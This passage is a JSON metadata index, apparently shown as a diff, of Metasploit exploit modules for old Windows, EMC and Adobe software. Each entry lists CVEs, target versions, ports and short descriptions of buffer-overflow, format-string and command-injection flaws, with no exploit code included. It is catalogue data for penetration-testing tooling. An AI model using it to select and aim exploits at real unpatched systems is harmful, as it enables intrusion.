"windows/dcerpc/ms03_026_dcom", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-service-down" - ], - "SideEffects": [ - "ioc-in-logs" - ], - "Reliability": [ - "repeatable-session" - ] - }, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/dcerpc/ms05_017_msmq": { - "name": "MS05-017 Microsoft Message Queueing Service Path Overflow", - "fullname": "exploit/windows/dcerpc/ms05_017_msmq", - "aliases": [], - "rank": 400, - "disclosure_date": "2005-04-12", - "type": "exploit", - "author": [ - "hdm " - ], - "description": "This module exploits a stack buffer overflow in the RPC interface\n to the Microsoft Message Queueing service. The offset to the\n return address changes based on the length of the system\n hostname, so this must be provided via the 'HNAME' option.\n Much thanks to snort.org and Jean-Baptiste Marchand's\n excellent MSRPC website.", - "references": [ - "CVE-2005-0059", - "OSVDB-15458", - "MSB-MS05-017", - "BID-13112" - ], - "platform": "Windows", - "arch": "", - "rport": 2103, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows 2000 ALL / Windows XP SP0-SP1 (English)" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/dcerpc/ms05_017_msmq.rb", - "is_install_path": true, - "ref_name": "windows/dcerpc/ms05_017_msmq", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/dcerpc/ms07_029_msdns_zonename": { - "name": "MS07-029 Microsoft DNS RPC Service extractQuotedChar() Overflow (TCP)", - "fullname": "exploit/windows/dcerpc/ms07_029_msdns_zonename", - "aliases": [], - "rank": 500, - "disclosure_date": "2007-04-12", - "type": "exploit", - "author": [ - "hdm ", - "Unknown", - "bcoles " - ], - "description": "This module exploits a stack buffer overflow in the RPC interface\n of the Microsoft DNS service. The vulnerability is triggered\n when a long zone name parameter is supplied that contains\n escaped octal strings. This module is capable of bypassing NX/DEP\n protection on Windows 2003 SP1/SP2.", - "references": [ - "CVE-2007-1748", - "OSVDB-34100", - "MSB-MS07-029" - ], - "platform": "Windows", - "arch": "", - "rport": 0, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic (2000 SP0-SP4, 2003 SP0-SP2)", - "Windows 2000 Server SP0-SP4+ English", - "Windows 2000 Server SP0-SP4+ French", - "Windows 2000 Server SP0-SP4+ German", - "Windows 2000 Server SP0-SP4+ Italian", - "Windows 2000 Server SP0-SP4+ Polish", - "Windows 2000 Server SP0-SP4+ Portuguese", - "Windows 2000 Server SP0-SP4+ Korean", - "Windows 2000 Server SP0-SP4+ Russian", - "Windows 2000 Server SP0-SP4+ Simplified Chinese", - "Windows 2000 Server SP0-SP4+ Spanish", - "Windows 2000 Server SP0-SP4+ Swedish", - "Windows 2000 Server SP0-SP4+ Traditional Chinese", - "Windows 2000 Server SP0-SP4+ Turkish", - "Windows 2003 Server SP0 English", - "Windows 2003 Server SP0 French", - "Windows 2003 Server SP1-SP2 English", - "Windows 2003 Server SP1-SP2 French", - "Windows 2003 Server SP1-SP2 Spanish", - "Windows 2003 Server SP1-SP2 Italian", - "Windows 2003 Server SP1-SP2 German", - "Windows 2003 Server SP1-SP2 Russian", - "Windows 2003 Server SP1-SP2 Simplified Chinese" - ], - "mod_time": "2021-11-30 07:38:08 +0000", - "path": "/modules/exploits/windows/dcerpc/ms07_029_msdns_zonename.rb", - "is_install_path": true, - "ref_name": "windows/dcerpc/ms07_029_msdns_zonename", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/dcerpc/ms07_065_msmq": { - "name": "MS07-065 Microsoft Message Queueing Service DNS Name Path Overflow", - "fullname": "exploit/windows/dcerpc/ms07_065_msmq", - "aliases": [], - "rank": 400, - "disclosure_date": "2007-12-11", - "type": "exploit", - "author": [ - "hdm " - ], - "description": "This module exploits a stack buffer overflow in the RPC interface\n to the Microsoft Message Queueing service. This exploit requires\n the target system to have been configured with a DNS name and\n for that name to be supplied in the 'DNAME' option. This name does\n not need to be served by a valid DNS server, only configured on\n the target machine.", - "references": [ - "CVE-2007-3039", - "OSVDB-39123", - "MSB-MS07-065" - ], - "platform": "Windows", - "arch": "", - "rport": 2103, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows 2000 Server English" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/dcerpc/ms07_065_msmq.rb", - "is_install_path": true, - "ref_name": "windows/dcerpc/ms07_065_msmq", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/email/ms07_017_ani_loadimage_chunksize": { - "name": "Windows ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (SMTP)", - "fullname": "exploit/windows/email/ms07_017_ani_loadimage_chunksize", - "aliases": [], - "rank": 500, - "disclosure_date": "2007-03-28", - "type": "exploit", - "author": [ - "hdm ", - "skape " - ], - "description": "This module exploits a buffer overflow vulnerability in the\n LoadAniIcon() function of USER32.dll. The flaw is triggered\n through Outlook Express by using the CURSOR style sheet\n directive to load a malicious .ANI file.\n\n This vulnerability was discovered by Alexander Sotirov of Determina\n and was rediscovered, in the wild, by McAfee.", - "references": [ - "MSB-MS07-017", - "CVE-2007-0038", - "CVE-2007-1765", - "OSVDB-33629", - "BID-23194" - ], - "platform": "Windows", - "arch": "", - "rport": 25, - "autofilter_ports": [ - 25, - 465, - 587, - 2525, - 25025, - 25000 - ], - "autofilter_services": [ - "smtp", - "smtps" - ], - "targets": [ - "Automatic", - "Windows XP SP2 user32.dll 5.1.2600.2622", - "Windows XP SP2 userenv.dll English", - "Windows XP SP2 userenv.dll French", - "Windows XP SP0/SP1 netui2.dll English", - "Windows 2000 SP0-SP4 netui2.dll English", - "Windows Vista user32.dll 6.0.6000.16386", - "Windows XP SP2 user32.dll (5.1.2600.2180) Multi Language", - "Windows XP SP2 user32.dll (5.1.2600.2180) English", - "Windows XP SP2 userenv.dll Portuguese (Brazil)", - "Windows XP SP1a userenv.dll English", - "Windows XP SP1a shell32.dll English" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/email/ms07_017_ani_loadimage_chunksize.rb", - "is_install_path": true, - "ref_name": "windows/email/ms07_017_ani_loadimage_chunksize", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/email/ms10_045_outlook_ref_only": { - "name": "Outlook ATTACH_BY_REF_ONLY File Execution", - "fullname": "exploit/windows/email/ms10_045_outlook_ref_only", - "aliases": [], - "rank": 600, - "disclosure_date": "2010-06-01", - "type": "exploit", - "author": [ - "Yorick Koster " - ], - "description": "It has been discovered that certain e-mail message cause Outlook to create Windows\n shortcut-like attachments or messages within Outlook. Through specially crafted TNEF\n streams with certain MAPI attachment properties, it is possible to set a path name\n to files to be executed. When a user double clicks on such an attachment or message,\n Outlook will proceed to execute the file that is set by the path name value. These\n files can be local files, but also files stored remotely (on a file share, for example)\n can be used. Exploitation is limited by the fact that it is not possible for attackers\n to supply command line options.", - "references": [ - "MSB-MS10-045", - "CVE-2010-0266", - "OSVDB-66296", - "BID-41446", - "URL-http://www.akitasecurity.nl/advisory.php?id=AK20091001" - ], - "platform": "Windows", - "arch": "", - "rport": 25, - "autofilter_ports": [ - 25, - 465, - 587, - 2525, - 25025, - 25000 - ], - "autofilter_services": [ - "smtp", - "smtps" - ], - "targets": [ - "Automatic" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/email/ms10_045_outlook_ref_only.rb", - "is_install_path": true, - "ref_name": "windows/email/ms10_045_outlook_ref_only", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/email/ms10_045_outlook_ref_resolve": { - "name": "Outlook ATTACH_BY_REF_RESOLVE File Execution", - "fullname": "exploit/windows/email/ms10_045_outlook_ref_resolve", - "aliases": [], - "rank": 600, - "disclosure_date": "2010-06-01", - "type": "exploit", - "author": [ - "Yorick Koster " - ], - "description": "It has been discovered that certain e-mail message cause Outlook to create Windows\n shortcut-like attachments or messages within Outlook. Through specially crafted TNEF\n streams with certain MAPI attachment properties, it is possible to set a path name\n to files to be executed. When a user double clicks on such an attachment or message,\n Outlook will proceed to execute the file that is set by the path name value. These\n files can be local files, but also file stored remotely for example on a file share.\n Exploitation is limited by the fact that its is not possible for attackers to supply\n command line options.", - "references": [ - "MSB-MS10-045", - "CVE-2010-0266", - "OSVDB-66296", - "BID-41446", - "URL-http://www.akitasecurity.nl/advisory.php?id=AK20091001" - ], - "platform": "Windows", - "arch": "", - "rport": 25, - "autofilter_ports": [ - 25, - 465, - 587, - 2525, - 25025, - 25000 - ], - "autofilter_services": [ - "smtp", - "smtps" - ], - "targets": [ - "Automatic" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/email/ms10_045_outlook_ref_resolve.rb", - "is_install_path": true, - "ref_name": "windows/email/ms10_045_outlook_ref_resolve", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/emc/alphastor_agent": { - "name": "EMC AlphaStor Agent Buffer Overflow", - "fullname": "exploit/windows/emc/alphastor_agent", - "aliases": [], - "rank": 500, - "disclosure_date": "2008-05-27", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a stack buffer overflow in EMC AlphaStor 3.1.\n By sending a specially crafted message, an attacker may\n be able to execute arbitrary code.", - "references": [ - "CVE-2008-2158", - "OSVDB-45714", - "URL-http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=702" - ], - "platform": "Windows", - "arch": "", - "rport": 41025, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "EMC AlphaStor 3.1" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/emc/alphastor_agent.rb", - "is_install_path": true, - "ref_name": "windows/emc/alphastor_agent", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/emc/alphastor_device_manager_exec": { - "name": "EMC AlphaStor Device Manager Opcode 0x75 Command Injection", - "fullname": "exploit/windows/emc/alphastor_device_manager_exec", - "aliases": [], - "rank": 600, - "disclosure_date": "2013-01-18", - "type": "exploit", - "author": [ - "Anyway ", - "Preston Thornburn ", - "Mohsan Farid ", - "Brent Morris ", - "juan vazquez " - ], - "description": "This module exploits a flaw within the Device Manager (rrobtd.exe). When parsing the 0x75\n command, the process does not properly filter user supplied input allowing for arbitrary\n command injection. This module has been tested successfully on EMC AlphaStor 4.0 build 116\n with Windows 2003 SP2 and Windows 2008 R2.", - "references": [ - "CVE-2013-0928", - "ZDI-13-033" - ], - "platform": "Windows", - "arch": "x86", - "rport": 3000, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "EMC AlphaStor 4.0 < build 800 / Windows Universal" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/emc/alphastor_device_manager_exec.rb", - "is_install_path": true, - "ref_name": "windows/emc/alphastor_device_manager_exec", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/emc/networker_format_string": { - "name": "EMC Networker Format String", - "fullname": "exploit/windows/emc/networker_format_string", - "aliases": [], - "rank": 300, - "disclosure_date": "2012-08-29", - "type": "exploit", - "author": [ - "Aaron Portnoy", - "Luigi Auriemma ", - "juan vazquez " - ], - "description": "This module exploits a format string vulnerability in the lg_sprintf function\n as implemented in liblocal.dll on EMC Networker products. This module exploits the\n vulnerability by using a specially crafted RPC call to the program number 0x5F3DD,\n version 0x02, and procedure 0x06. This module has been tested successfully on EMC\n Networker 7.6 SP3 on Windows XP SP3 and Windows 2003 SP2 (DEP bypass).", - "references": [ - "CVE-2012-2288", - "OSVDB-85116", - "BID-55330", - "URL-http://aluigi.altervista.org/misc/aluigi0216_story.txt" - ], - "platform": "Windows", - "arch": "", - "rport": 111, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "EMC Networker 7.6 SP3 / Windows Universal", - "EMC Networker 7.6 SP3 / Windows XP SP3", - "EMC Networker 7.6 SP3 / Windows 2003 SP2" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/emc/networker_format_string.rb", - "is_install_path": true, - "ref_name": "windows/emc/networker_format_string", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/emc/replication_manager_exec": { - "name": "EMC Replication Manager Command Execution", - "fullname": "exploit/windows/emc/replication_manager_exec", - "aliases": [], - "rank": 500, - "disclosure_date": "2011-02-07", - "type": "exploit", - "author": [ - "Unknown", - "Davy Douhine" - ], - "description": "This module exploits a remote command-injection vulnerability in EMC Replication Manager\n client (irccd.exe). By sending a specially crafted message invoking RunProgram function an\n attacker may be able to execute arbitrary commands with SYSTEM privileges. Affected\n products are EMC Replication Manager < 5.3. This module has been successfully tested\n against EMC Replication Manager 5.2.1 on XP/W2003. EMC Networker Module for Microsoft\n Applications 2.1 and 2.2 may be vulnerable too although this module have not been tested\n against these products.", - "references": [ - "CVE-2011-0647", - "OSVDB-70853", - "BID-46235", - "URL-http://www.securityfocus.com/archive/1/516260", - "ZDI-11-061" - ], - "platform": "Windows", - "arch": "x86", - "rport": 6542, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "EMC Replication Manager 5.2.1 / Windows Native Payload" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/emc/replication_manager_exec.rb", - "is_install_path": true, - "ref_name": "windows/emc/replication_manager_exec", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/a_pdf_wav_to_mp3": { - "name": "A-PDF WAV to MP3 v1.0.0 Buffer Overflow", - "fullname": "exploit/windows/fileformat/a_pdf_wav_to_mp3", - "aliases": [], - "rank": 300, - "disclosure_date": "2010-08-17", - "type": "exploit", - "author": [ - "d4rk-h4ck3r", - "Dr_IDE", - "dookie" - ], - "description": "This module exploits a buffer overflow in A-PDF WAV to MP3 v1.0.0. When\n the application is used to import a specially crafted m3u file, a buffer overflow occurs\n allowing arbitrary code execution.", - "references": [ - "OSVDB-67241", - "EDB-14676", - "EDB-14681" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows Universal" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/a_pdf_wav_to_mp3.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/a_pdf_wav_to_mp3", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/abbs_amp_lst": { - "name": "ABBS Audio Media Player .LST Buffer Overflow", - "fullname": "exploit/windows/fileformat/abbs_amp_lst", - "aliases": [], - "rank": 300, - "disclosure_date": "2013-06-30", - "type": "exploit", - "author": [ - "Julian Ahrens", - "modpr0be " - ], - "description": "This module exploits a buffer overflow in ABBS Audio Media Player. The vulnerability\n occurs when adding a specially crafted .lst file, allowing arbitrary code execution with the privileges\n of the user running the application. This module has been tested successfully on\n ABBS Audio Media Player 3.1 over Windows XP SP3 and Windows 7 SP1.", - "references": [ - "OSVDB-75096", - "EDB-25204" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "ABBS Audio Media Player 3.1 / Windows XP SP3 / Windows 7 SP1" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/abbs_amp_lst.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/abbs_amp_lst", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/acdsee_fotoslate_string": { - "name": "ACDSee FotoSlate PLP File id Parameter Overflow", - "fullname": "exploit/windows/fileformat/acdsee_fotoslate_string", - "aliases": [], - "rank": 400, - "disclosure_date": "2011-09-12", - "type": "exploit", - "author": [ - "Parvez Anwar", - "juan vazquez " - ], - "description": "This module exploits a buffer overflow in ACDSee FotoSlate 4.0 Build 146 via\n a specially crafted id parameter in a String element. When viewing a malicious\n PLP file with the ACDSee FotoSlate product, a remote attacker could overflow a\n buffer and execute arbitrary code. This exploit has been tested on systems such as\n Windows XP SP3, Windows Vista, and Windows 7.", - "references": [ - "CVE-2011-2595", - "OSVDB-75425", - "BID-49558" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "ACDSee FotoSlate 4.0 Build 146" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/acdsee_fotoslate_string.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/acdsee_fotoslate_string", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/acdsee_xpm": { - "name": "ACDSee XPM File Section Buffer Overflow", - "fullname": "exploit/windows/fileformat/acdsee_xpm", - "aliases": [], - "rank": 400, - "disclosure_date": "2007-11-23", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a buffer overflow in ACDSee 9.0.\n When viewing a malicious XPM file with the ACDSee product,\n a remote attacker could overflow a buffer and execute\n arbitrary code.", - "references": [ - "CVE-2007-2193", - "OSVDB-35236", - "BID-23620" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "ACDSee 9.0 (Build 1008)" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/acdsee_xpm.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/acdsee_xpm", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/actfax_import_users_bof": { - "name": "ActiveFax (ActFax) 4.3 Client Importer Buffer Overflow", - "fullname": "exploit/windows/fileformat/actfax_import_users_bof", - "aliases": [], - "rank": 300, - "disclosure_date": "2012-08-28", - "type": "exploit", - "author": [ - "Craig Freyman", - "Brandon Perry", - "juan vazquez " - ], - "description": "This module exploits a vulnerability in ActiveFax Server. The vulnerability is\n a stack based buffer overflow in the \"Import Users from File\" function, due to the\n insecure usage of strcpy while parsing the csv formatted file. The module creates a\n .exp file that must be imported with ActiveFax Server. It must be imported with the\n default character set 'ECMA-94 / Latin 1 (ISO 8859)'. The module has been tested\n successfully on ActFax Server 4.32 over Windows XP SP3 and Windows 7 SP1. In the\n Windows XP case, when ActFax runs as a service, it will execute as SYSTEM.", - "references": [ - "OSVDB-85175", - "EDB-20915", - "URL-http://www.pwnag3.com/2012/08/actfax-local-privilege-escalation.html" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "ActFax 4.32 / Windows XP SP3 EN / Windows 7 SP1" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/actfax_import_users_bof.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/actfax_import_users_bof", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/activepdf_webgrabber": { - "name": "activePDF WebGrabber ActiveX Control Buffer Overflow", - "fullname": "exploit/windows/fileformat/activepdf_webgrabber", - "aliases": [], - "rank": 100, - "disclosure_date": "2008-08-26", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a stack buffer overflow in activePDF WebGrabber 3.8. When\n sending an overly long string to the GetStatus() method of APWebGrb.ocx (3.8.2.0)\n an attacker may be able to execute arbitrary code. This control is not marked safe\n for scripting, so choose your attack vector accordingly.", - "references": [ - "OSVDB-64579", - "URL-http://www.activepdf.com/products/serverproducts/webgrabber/" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/activepdf_webgrabber.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/activepdf_webgrabber", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/adobe_collectemailinfo": { - "name": "Adobe Collab.collectEmailInfo() Buffer Overflow", - "fullname": "exploit/windows/fileformat/adobe_collectemailinfo", - "aliases": [], - "rank": 400, - "disclosure_date": "2008-02-08", - "type": "exploit", - "author": [ - "MC ", - "Didier Stevens " - ], - "description": "This module exploits a buffer overflow in Adobe Reader and Adobe Acrobat Professional 8.1.1.\n By creating a specially crafted pdf that a contains malformed Collab.collectEmailInfo() call,\n an attacker may be able to execute arbitrary code.", - "references": [ - "CVE-2007-5659", - "OSVDB-41495" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Adobe Reader v8.1.1 (Windows XP SP0-SP3 English)" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/adobe_collectemailinfo.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/adobe_collectemailinfo", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/adobe_cooltype_sing": { - "name": "Adobe CoolType SING Table \"uniqueName\" Stack Buffer Overflow", - "fullname": "exploit/windows/fileformat/adobe_cooltype_sing", - "aliases": [], - "rank": 500, - "disclosure_date": "2010-09-07", - "type": "exploit", - "author": [ - "Unknown", - "sn0wfl0w", - "jduck " - ], - "description": "This module exploits a vulnerability in the Smart INdependent Glyplets (SING) table\n handling within versions 8.2.4 and 9.3.4 of Adobe Reader. Prior versions are\n assumed to be vulnerable as well.", - "references": [ - "CVE-2010-2883", - "OSVDB-67849", - "URL-http://contagiodump.blogspot.com/2010/09/cve-david-leadbetters-one-point-lesson.html", - "URL-http://www.adobe.com/support/security/advisories/apsa10-02.html" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/adobe_cooltype_sing.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/adobe_cooltype_sing", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/adobe_flashplayer_button": { - "name": "Adobe Flash Player \"Button\" Remote Code Execution", - "fullname": "exploit/windows/fileformat/adobe_flashplayer_button", - "aliases": [], - "rank": 300, - "disclosure_date": "2010-10-28", - "type": "exploit", - "author": [ - "Unknown", - "Haifei Li", - "jduck " - ], - "description": "This module exploits a vulnerability in the handling of certain SWF movies\n within versions 9.x and 10.0 of Adobe Flash Player. Adobe Reader and Acrobat\n are also vulnerable, as are any other applications that may embed Flash player.\n\n Arbitrary code execution is achieved by embedding a specially crafted Flash\n movie into a PDF document. An AcroJS heap spray is used in order to ensure\n that the memory used by the invalid pointer issue is controlled.\n\n NOTE: This module uses a similar DEP bypass method to that used within the\n adobe_libtiff module. This method is unlikely to work across various\n Windows versions due to a hardcoded syscall number.", - "references": [ - "CVE-2010-3654", - "OSVDB-68932", - "BID-44504", - "URL-http://www.adobe.com/support/security/advisories/apsa10-05.html", - "URL-http://blog.fortinet.com/fuzz-my-life-flash-player-zero-day-vulnerability-cve-2010-3654/", - "URL-http://feliam.wordpress.com/2010/02/11/flash-on-a-pdf-with-minipdf-py/" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/adobe_flashplayer_button.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/adobe_flashplayer_button", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/adobe_flashplayer_newfunction": { - "name": "Adobe Flash Player \"newfunction\" Invalid Pointer Use", - "fullname": "exploit/windows/fileformat/adobe_flashplayer_newfunction", - "aliases": [], - "rank": 300, - "disclosure_date": "2010-06-04", - "type": "exploit", - "author": [ - "Unknown", - "jduck " - ], - "description": "This module exploits a vulnerability in the DoABC tag handling within\n versions 9.x and 10.0 of Adobe Flash Player. Adobe Reader and Acrobat are also\n vulnerable, as are any other applications that may embed Flash player.\n\n Arbitrary code execution is achieved by embedding a specially crafted Flash\n movie into a PDF document. An AcroJS heap spray is used in order to ensure\n that the memory used by the invalid pointer issue is controlled.\n\n NOTE: This module uses a similar DEP bypass method to that used within the\n adobe_libtiff module. This method is unlikely to work across various\n Windows versions due a the hardcoded syscall number.", - "references": [ - "CVE-2010-1297", - "OSVDB-65141", - "BID-40586", - "URL-http://www.adobe.com/support/security/advisories/apsa10-01.html", - "URL-http://feliam.wordpress.com/2010/02/11/flash-on-a-pdf-with-minipdf-py/" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/adobe_flashplayer_newfunction.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/adobe_flashplayer_newfunction", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/adobe_flatedecode_predictor02": { - "name": "Adobe FlateDecode Stream Predictor 02 Integer Overflow", - "fullname": "exploit/windows/fileformat/adobe_flatedecode_predictor02", - "aliases": [], - "rank": 400, - "disclosure_date": "2009-10-08", - "type": "exploit", - "author": [ - "unknown", - "jduck " - ], - "description": "This module exploits an integer overflow vulnerability in Adobe Reader and Adobe\n Acrobat Professional versions before 9.2.", - "references": [ - "CVE-2009-3459", - "BID-36600", - "OSVDB-58729", - "URL-http://web.archive.org/web/20201207001443/https://blogs.adobe.com/psirt/2009/10/adobe_reader_and_acrobat_issue_1.html/", - "URL-http://www.adobe.com/support/security/bulletins/apsb09-15.html" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Adobe Reader Windows Universal (JS Heap Spray)" - ], - "mod_time": "2025-02-28 09:35:28 +0000", - "path": "/modules/exploits/windows/fileformat/adobe_flatedecode_predictor02.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/adobe_flatedecode_predictor02", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/adobe_geticon": { - "name": "Adobe Collab.getIcon() Buffer Overflow", - "fullname": "exploit/windows/fileformat/adobe_geticon", - "aliases": [], - "rank": 400, - "disclosure_date": "2009-03-24", - "type": "exploit", - "author": [ - "MC ", - "Didier Stevens ", - "jduck " - ], - "description": "This module exploits a buffer overflow in Adobe Reader and Adobe Acrobat.\n Affected versions include < 7.1.1, < 8.1.3, and < 9.1. By creating a specially\n crafted pdf that a contains malformed Collab.getIcon() call, an attacker may\n be able to execute arbitrary code.", - "references": [ - "CVE-2009-0927", - "OSVDB-53647", - "ZDI-09-014" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Adobe Reader Universal (JS Heap Spray)" - ], - "mod_time": "2020-09-22 02:56:51 +0000", - "path": "/modules/exploits/windows/fileformat/adobe_geticon.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/adobe_geticon", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/adobe_illustrator_v14_eps": { - "name": "Adobe Illustrator CS4 v14.0.0", - "fullname": "exploit/windows/fileformat/adobe_illustrator_v14_eps", - "aliases": [], - "rank": 500, - "disclosure_date": "2009-12-03", - "type": "exploit", - "author": [ - "pyrokinesis", - "dookie" - ], - "description": "Adobe Illustrator CS4 (V14.0.0) Encapsulated Postscript (.eps)\n overlong DSC Comment Buffer Overflow Exploit", - "references": [ - "CVE-2009-4195", - "BID-37192", - "OSVDB-60632", - "EDB-10281" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows Universal" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/adobe_illustrator_v14_eps.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/adobe_illustrator_v14_eps", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/adobe_jbig2decode": { - "name": "Adobe JBIG2Decode Memory Corruption", - "fullname": "exploit/windows/fileformat/adobe_jbig2decode", - "aliases": [], - "rank": 400, - "disclosure_date": "2009-02-19", - "type": "exploit", - "author": [ - "natron ", - "xort", - "redsand", - "MC ", - "Didier Stevens " - ], - "description": "This module exploits a heap-based pointer corruption flaw in Adobe Reader 9.0.0 and earlier.\n This module relies upon javascript for the heap spray.", - "references": [ - "CVE-2009-0658", - "OSVDB-52073" - ], - "platform": "Windows", - 